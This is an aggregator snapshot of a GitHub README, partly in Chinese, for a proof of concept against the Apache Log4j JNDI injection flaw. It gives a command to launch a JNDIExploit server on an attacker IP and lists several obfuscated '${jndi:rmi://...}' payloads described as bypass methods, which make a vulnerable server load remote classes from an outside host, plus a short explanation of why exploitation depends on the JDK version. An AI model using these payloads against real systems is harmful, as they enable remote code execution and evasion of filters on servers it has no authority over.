4

GitHub - shanfenglan/apache_log4j_poc: apache log4j poc—— base Maven

 3 years ago
source link: https://github.com/shanfenglan/apache_log4j_poc
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

apache_log4j_poc

apache log4j poc—— base Maven

原理:https://mp.weixin.qq.com/s/K74c1pTG6m5rKFuKaIYmPg

使用JNDIExploit开启jndi服务器:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.171.1 -l 12344 -p 9999

参考文章:https://www.codenong.com/f23e29b783ff38df36c9/

bypass 方式

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

JNDI注入原理及利用 

JDNI注入由于其加载动态类原理是JNDI Reference远程加载Object Factory类的特性(使用的不是RMI Class Loading,而是URLClassLoader)。

这个漏洞的利用跟JDK中的配置有很大关系,换句话说跟jdk版本关系很大。 只要JDK版本无漏洞,那么apache log4j的这个RCE就很难利用成功。


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK